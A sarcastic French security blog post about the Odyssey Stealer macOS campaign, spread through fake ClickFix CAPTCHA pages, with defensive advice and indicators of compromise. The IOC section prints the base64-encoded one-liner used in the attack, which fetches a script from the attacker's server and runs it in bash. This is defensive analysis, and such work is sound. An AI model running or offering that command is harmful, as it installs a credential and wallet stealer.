🎭 Odyssey Stealer & ClickFix : les Mac ne sont plus les chouchous intouchables d’Apple

Bienvenue dans l’ùre du ClickFix 2.0, oĂč les cybercriminels exploitent la confiance naĂŻve et le snobisme sĂ©curitaire des utilisateurs Mac. Cette fois, pas besoin de binaire louchant dans ton Finder, pas de pop-up douteuse qui demande un .dmg. Non, ici l’ennemi, c’est toi. Oui, toi, qui tapes religieusement une commande trouvĂ©e sur une page web parce que tu crois passer un CAPTCHA « intelligent ».
On avait dĂ©jĂ  parlĂ© de Clickfix : 🧬 ClickFix : le CAPTCHA que vous allez regretter d’avoir cochĂ©

Ah, les utilisateurs de Mac
 Toujours convaincus d’ĂȘtre au-dessus de la mĂȘlĂ©e numĂ©rique.
« Moi ? InfectĂ© ? Non mais enfin, j’ai un Mac, voyons ! »
Spoiler : ce mythe vient de prendre une balle en pleine pomme đŸđŸ’„.


đŸ€Ą Le scĂ©nario : un CAPTCHA qui teste ton QI (spoiler, tu perds)

Les attaquants ont inventĂ© une ruse digne d’un tour de passe-passe de David Copperfield.

  • Tu arrives sur un site lĂ©gitime en apparence (tradingviewen[.]com).
  • Tu tombes sur une page avec un faux CAPTCHA : « Prouvez que vous ĂȘtes humain : ouvrez Terminal et collez ça ».
  • L’utilisateur, dĂ©jĂ  convaincu que macOS est impĂ©nĂ©trable comme Fort Knox, s’exĂ©cute.

RĂ©sultat : un echo "base64 
" | bash s’exĂ©cute, et BOUM 💣, tu viens d’inviter Odyssey Stealer chez toi. Pas besoin de .exe, pas besoin de .pkg, pas mĂȘme un pauvre .app : juste ta confiance aveugle et ton copier-coller malheureux.


đŸ•”ïžâ€â™‚ïž Le payload : AppleScript, mais pas celui qui te fait gagner du temps

Le code injectĂ© dĂ©ploie un AppleScript obfusquĂ© planquĂ© dans /tmp.
Mission :

  • Fouiller ton bureau et tes documents Ă  la recherche de .pdf, .docx, .txt (tu sais, le fichier « motsdepasse.txt » que tu pensais malin de cacher dans un sous-dossier) ;
  • RĂ©cupĂ©rer tes cookies Safari et ton Keychain (donc tes logins iCloud, Google, ton Slack pro, etc.) ;
  • Explorer Firefox, Chrome, Edge, Brave, Opera (oui, mĂȘme Opera, paix Ă  son Ăąme) ;
  • Et surtout : sniffer toutes traces de wallets crypto (Exodus, Wasabi, Electrum
).

En gros, ton Mac devient un buffet libre pour cybercriminels affamĂ©s.


🚚 L’exfiltration : ZIP express, destination Russie (ou pire)

Une fois l’aspirateur passĂ©, le script compresse tout en un petit out.zip planquĂ© dans /tmp.
Ensuite, un simple curl l’envoie Ă  une IP (45.146.130[.]131), qui sert de panneau de contrĂŽle Odyssey Stealer.
Puis, nettoyage : /tmp effacĂ© → pas de traces → pas d’indices → pas de whisky pour les analystes forensic.

Les attaquants se retrouvent avec ton historique, tes cookies de session (donc accÚs direct à ton Gmail / LinkedIn sans mot de passe), et possiblement tes clés crypto.
Toi ? Tu continues Ă  poster sur Mastodon que « macOS n’a pas besoin d’antivirus ».


🧹 Pourquoi c’est un problĂšme en entreprise

À la maison, tu perds tes cryptos et tes notes de shopping.
En entreprise ? Tu perds :

  • Ton compte AD (parce que ton Mac est joint au domaine comme un grand),
  • Tes accĂšs VPN,
  • Tes sessions SaaS (Teams, Salesforce, etc.),
  • Tes partages de fichiers (bonjour le ransomware).

Le Mac, longtemps perçu comme un enfant gĂątĂ© intouchable, devient alors le cheval de Troie qui flingue tout le rĂ©seau. Et non, ce n’est pas de la science-fiction.


đŸ“± Et iOS dans tout ça ?

Bonne nouvelle (temporairement) : iOS est relativement Ă©pargnĂ©. Le sandboxing et l’absence de terminal copiable-collable bloquent ce genre d’attaque.
Mauvaise nouvelle : les attaquants adorent innover. Demain, ça peut passer par :

  • Des profils MDM piĂ©gĂ©s (installĂ©s via un lien « corporate » fake),
  • Du sideloading d’app hors App Store,
  • Des pages Safari qui abusent d’exploits WebKit.

Bref, ton iPhone n’est pas encore dans la ligne de mire du ClickFix, mais ça viendra.


đŸ›Ąïž Comment se protĂ©ger (et Ă©viter de passer pour un pigeon)

  1. Sensibilisation : on ne copie-colle jamais une commande trouvée sur un site web random.
  2. EDR / NGFW : surveiller /tmp, bloquer les IPs et URLs de C2.
  3. Crypto : séparer ton wallet de ton poste de travail principal (Ledger > MacBook).
  4. Admins IT : surveiller les Mac en AD comme des Windows → patchs, EDR, logs centralisĂ©s.
  5. Utilisateurs Mac : arrĂȘtez de croire que « ça n’arrive qu’aux autres ».

đŸ§Ÿ IOC – Indicators of Compromise

👉 À utiliser pour bloquer, monitorer ou investiguer :

🌐 Domaines malveillants

  • tradingviewen[.]com

🔗 URLs observĂ©es

  • hxxp://45.146.130[.]131/d/vipx14350 (AppleScript malveillant)
  • hxxp://45.146.130[.]131/log (exfiltration de donnĂ©es)

đŸ’» Adresse IP

  • 45.146.130[.]131 – Serveur C2 identifiĂ© (Odyssey Stealer)

📂 Artefacts locaux

  • /tmp/out.zip → archive exfiltrĂ©e avant envoi
  • RĂ©pertoire temporaire /tmp/* (nettoyĂ© en fin d’exĂ©cution)
  • Processus liĂ©s : osascript, curl, base64 -d | bash

⚠ Commande suspecte typique

echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash

📌 Conseils rapides aux SOC/Blue Teams :

  • Surveiller toute utilisation inhabituelle de base64 -d | bash.
  • Monitorer osascript dĂ©clenchĂ© depuis Terminal.
  • VĂ©rifier logs proxy/pare-feu pour trafic vers 45.146.130[.]131.
  • Inspecter toute crĂ©ation/suppression rapide de fichiers dans /tmp/.

🎬 Conclusion sarcastique

Mac n’est plus un ülot paradisiaque flottant au-dessus du cyber-chaos.
Avec Odyssey Stealer et ClickFix, les attaquants ont trouvĂ© le moyen d’utiliser ta propre main pour tirer la gĂąchette.
Alors oui, tu peux continuer Ă  dire « je n’ai pas d’antivirus, je suis sous Mac ». Mais rappelle-toi : quand tu tapes base64 -d | bash comme un bon petit soldat, ce n’est plus un MacBook Pro. C’est un MacBook Powned.

🎭 Odyssey Stealer & ClickFix : les Mac ne sont plus les chouchous intouchables d’Apple
Partager cet article : Twitter LinkedIn WhatsApp

đŸ–‹ïž PubliĂ© sur SecuSlice.com

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Retour en haut